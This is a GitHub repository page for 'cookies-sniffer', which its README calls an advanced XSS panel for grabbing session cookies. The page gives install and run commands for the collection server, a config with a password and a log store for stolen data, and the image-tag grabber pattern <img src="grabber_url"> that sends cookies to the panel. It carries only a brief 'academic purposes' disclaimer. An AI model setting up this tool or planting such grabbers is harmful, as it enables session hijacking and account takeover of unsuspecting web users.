Skip to content

Inplex-sys/cookies-sniffer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

28 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Cookies-sniffer

Features!

  • Simple data saving (JSON)
  • Modulable
  • Securized login system
  • WEB & CLI logs saving
  • Linux and windows usable

How it work ?

alt text

Installation

Install the app on the server

user@domain:~# git clone https://github.com/inplex-sys/cookies-sniffer.git
user@domain:~# cd ./cookies-sniffer/
user@domain:~# npm install
user@domain:~# node app.js

Edit credentials in config.json

{
  "credentials":{
    "auth_key":"put-your-password"
  },
  "logs":[]
}

Disclamer

This repository is for academic purposes, the use of this software is your responsibility.

About

This app is an advanced XSS panel, this is used for session grabbing with XSS exploit and <img src="grabber_url">

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published